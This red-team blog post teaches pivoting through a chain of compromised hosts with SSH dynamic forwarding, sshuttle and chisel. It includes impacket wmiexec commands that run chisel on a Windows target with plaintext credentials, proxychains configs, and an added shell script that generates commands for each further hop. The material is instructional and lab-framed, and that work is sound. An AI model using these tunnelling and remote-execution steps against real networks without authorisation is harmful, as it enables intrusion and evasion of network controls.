Categories
red teaming

Pivoting Down the Rabbit Hole

I remember one of the first security competitions I did in school: our team was beaten by the team that was able to pivot within the environment of intentionally vulnerable systems. Since then I've been able to learn some of the ways you can move between systems. This post documents a few of them, using SSH dynamic port forwarding, sshuttle, and chisel. If the connections seem confusing while you are making them, read the post in its entirety and then adjust the steps to fit your needs. Without further ado, let's take that red pill!

Making Connections

Link #1
SSH Dynamic Port Forwarding
Local Kali system (Host1) --> Virtual Private Server (Host2)

root@eternalnoob:~# ssh -N -D 9050 -i /root/id_rsa1 thenoob@eternalnoob_vps

This establishes the first link in the chain: a SOCKS proxy listening on 127.0.0.1:9050 on Host1 whose traffic exits from Host2 (which is connected to a VPN into the environment we're targeting). -N keeps the session open without running a remote shell, and the -D listener is bound to localhost by default and accepts both SOCKS4 and SOCKS5 clients, which is why either proxy type works for it in proxychains.

Links #2 and #3
sshuttle
Virtual Private Server (Host2) --> Target1 & VPN Environment

thenoob@eternalnoob_vps:~$ sshuttle -vv -r victim1@target1 --ssh-cmd='ssh -i /root/id_rsa2' 172.16.1.0/24

This establishes the second and third links in the chain: sshuttle opens an SSH session from Host2 to Target1 (Link #2) and then, using local firewall rules, transparently routes any traffic Host2 sends to 172.16.1.0/24 through that session (Link #3). sshuttle needs root on Host2 to install those rules (it will prompt for sudo) and needs Python on Target1. Once it is up, any connection that arrives over Link #1 and leaves Host2 for the target subnet is forwarded through Target1 without further configuration.

Link #4
chisel
Target2 --> Target3

Now that Host2 can reach the VPN environment, we can use Target2 as the next pivot to reach Target3. Exposing a SOCKS proxy on Target2 with chisel takes a few steps.

  1. First start the chisel server on Host2, listening on port 8000 for incoming connections. --reverse lets clients request reverse tunnels, which step two needs. The --auth flag is optional as far as chisel is concerned, but this port has to be reachable from the target environment and is therefore exposed on the VPS, so set it.
    thenoob@eternalnoob_vps:~$ ./chisel server -p 8000 --reverse --auth thenoob:secretsockspassword

  2. Next, create a client on Target2 for the server from step one. Here 10.10.13.3 is Host2's address as reached from the target environment, and R:2222:127.0.0.1:1111 asks Host2 to listen on port 2222 and forward it to 127.0.0.1:1111 on Target2, the port the server in step three will listen on. By default chisel binds that listener on all of Host2's interfaces; write R:127.0.0.1:2222:127.0.0.1:1111 to keep it on loopback. Note: the chisel executable needs to be transferred to Target2 before these steps can be executed, and the client keeps running, so the wmiexec session will block until it is killed; run it in its own terminal.
    From Host1:
    root@eternalnoob:~# proxychains python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe client --auth thenoob:secretsockspassword 10.10.13.3:8000 R:2222:127.0.0.1:1111'
    Or from Host2:
    thenoob@eternalnoob_vps:~$ python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe client --auth thenoob:secretsockspassword 10.10.13.3:8000 R:2222:127.0.0.1:1111'

  3. Then start a chisel server on Target2 with --socks5, using the same executable from step two. It listens on port 1111, the port the reverse tunnel from step two points at, so the tunnel only starts carrying traffic once this server is up.
    From Host1:
    root@eternalnoob:~# proxychains python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe server --auth thenoob:secretsockspassword -p 1111 --socks5'
    Or from Host2:
    thenoob@eternalnoob_vps:~$ python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe server --auth thenoob:secretsockspassword -p 1111 --socks5'

  4. And finally, on Host2, create a client that connects through the reverse tunnel (localhost:2222) to the server from step three and exposes its SOCKS5 proxy on port 1081 of Host2. As in step two, chisel binds this listener on all interfaces by default; use 127.0.0.1:1081:socks to restrict it to loopback, since anyone who can reach it gets a proxy into the target network.
    thenoob@eternalnoob_vps:~$ ./chisel client --auth thenoob:secretsockspassword localhost:2222 1081:socks

With that SOCKS proxy established, we can reach Target3 from Host1. Modify the bottom of the /etc/proxychains.conf file on Host1 to add this link:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 127.0.0.1 1081 thenoob secretsockspassword

Note: see how the chain first connects to 127.0.0.1:9050 (Link #1), uses the connections established on Host2 (Links #2 and #3), then connects to 127.0.0.1:1081 (Link #4), and finally hits the RDP service on Target3. The second proxy address is resolved by the SSH SOCKS server on Host2, so 127.0.0.1:1081 means Host2's loopback, not Host1's. The username and password on the socks5 line are carried over from --auth; that pair protects the chisel tunnel, and chisel's SOCKS5 listener does not itself ask for SOCKS credentials, so proxychains works here with or without them.

If you want to keep going down the rabbit hole to Link #5 and beyond, repeat the steps from Link #4 on Target3. Some of the port numbers must change, since the Link #4 ones are already in use; for simplicity's sake, increment every port number by one for each new link. Then modify the bottom of the /etc/proxychains.conf file on Host1 to add the subsequent link:

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
#socks5 127.0.0.1 1081 thenoob secretsockspassword
socks5 127.0.0.1 1082 thenoob secretsockspassword

Note: the Link #4 socks5 line (port 1081) is commented out while Link #5 is in use; flip the two lines when Link #4 is needed instead. In the default strict_chain mode proxychains goes through every uncommented entry in order, so leaving both active would try to chain through both.
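The following script is an added example, not code from the original post. It generalizes the Link #4 procedure to link N (N=1 is Link #4, N=2 is Link #5, and so on): it computes the ports for that link, prints the four chisel commands and the matching proxychains [ProxyList] for Host1, and checks an `ss -ltn` listing taken on Host2 for the listeners the link needs, which is the first thing to verify before debugging proxychains. It reuses the post's Host2 address, --auth pair and base ports; the increment-by-one port scheme, the loopback binding of the Host2-side listeners and the sample ss output are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Taken from the post:
# Host2's address 10.10.13.3, the --auth pair, the base ports
# 8000/2222/1111/1081. Assumed: every base port is incremented by one per
# link, Host2-side chisel listeners are bound to loopback, and the ss
# output near the bottom is a constructed sample.

AUTH="thenoob:secretsockspassword"
HOST2_IP="10.10.13.3"

# Ports for link N: offset each base port from the post by N-1 so that
# consecutive links never collide on Host2 or on the pivot host.
server_port()  { echo $((8000 + $1 - 1)); }   # chisel server on Host2
reverse_port() { echo $((2222 + $1 - 1)); }   # reverse-tunnel entry on Host2
pivot_port()   { echo $((1111 + $1 - 1)); }   # chisel server on the pivot host
socks_port()   { echo $((1081 + $1 - 1)); }   # SOCKS5 endpoint on Host2

# hop_commands N [PIVOT_EXE]: the four commands for link N, in the order the
# post runs them (Host2 server, pivot client, pivot server, Host2 client).
hop_commands() {
  n=$1
  exe=${2:-}
  [ -n "$exe" ] || exe='c:\users\public\chisel.exe'
  printf '# step 1, on Host2:\n./chisel server -p %s --reverse --auth %s\n' \
    "$(server_port "$n")" "$AUTH"
  printf '# step 2, on the pivot:\n%s client --auth %s %s:%s R:127.0.0.1:%s:127.0.0.1:%s\n' \
    "$exe" "$AUTH" "$HOST2_IP" "$(server_port "$n")" "$(reverse_port "$n")" "$(pivot_port "$n")"
  printf '# step 3, on the pivot:\n%s server --auth %s -p %s --socks5\n' \
    "$exe" "$AUTH" "$(pivot_port "$n")"
  printf '# step 4, on Host2:\n./chisel client --auth %s localhost:%s 127.0.0.1:%s:socks\n' \
    "$AUTH" "$(reverse_port "$n")" "$(socks_port "$n")"
}

# proxylist N: the [ProxyList] for Host1 with Link #1 first, link N's SOCKS5
# endpoint live and every earlier link's endpoint commented out, because in
# the default strict_chain mode proxychains goes through every uncommented
# entry in order.
proxylist() {
  n=$1
  printf '[ProxyList]\nsocks4 127.0.0.1 9050\n'
  i=1
  while [ "$i" -le "$n" ]; do
    if [ "$i" -eq "$n" ]; then prefix=''; else prefix='#'; fi
    printf '%ssocks5 127.0.0.1 %s %s\n' "$prefix" "$(socks_port "$i")" "${AUTH%%:*} ${AUTH#*:}"
    i=$((i + 1))
  done
}

# missing_listeners N SS_OUTPUT: prints each port that link N needs on Host2
# but that is not LISTENing in the supplied `ss -ltn` output, one per line.
# An empty result means the Host2 side of link N is fully up.
missing_listeners() {
  n=$1
  ss_out=$2
  for p in "$(server_port "$n")" "$(reverse_port "$n")" "$(socks_port "$n")"; do
    printf '%s\n' "$ss_out" | grep -Eq "[:.]$p([[:space:]]|\$)" || echo "$p"
  done
}

# Constructed `ss -ltn` sample: Host2 after Link #5 steps 1 and 2, before
# step 4 has been run, so 1082 is not yet listening (1081 belongs to Link #4).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      4096         0.0.0.0:8001        0.0.0.0:*
LISTEN 0      4096       127.0.0.1:2223        0.0.0.0:*
LISTEN 0      4096       127.0.0.1:1081        0.0.0.0:*'

hop_commands 2
proxylist 2
echo "missing on Host2 for link 2: $(missing_listeners 2 "$SAMPLE_SS" | tr '\n' ' ')"
```

Feed `missing_listeners` the real output of `ss -ltn` on Host2 (for example `missing_listeners 2 "$(ss -ltn)"`); a port it reports is the step whose process has died or never started, which is far quicker to spot than a proxychains timeout.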

Other considerations when using proxychains:

  • Comment out quiet_mode in the conf file to see each hop's connection attempts when debugging; uncomment it again once the output is too much to handle.
  • Comment out proxy_dns if you don't need DNS requests resolved through the chain; with it enabled, every name lookup is also sent down the proxies.

Resources

  • https://0xdf.gitlab.io/2019/01/28/tunneling-with-chisel-and-ssf.html
  • https://www.techrepublic.com/article/how-to-use-ssh-as-a-vpn-with-sshuttle/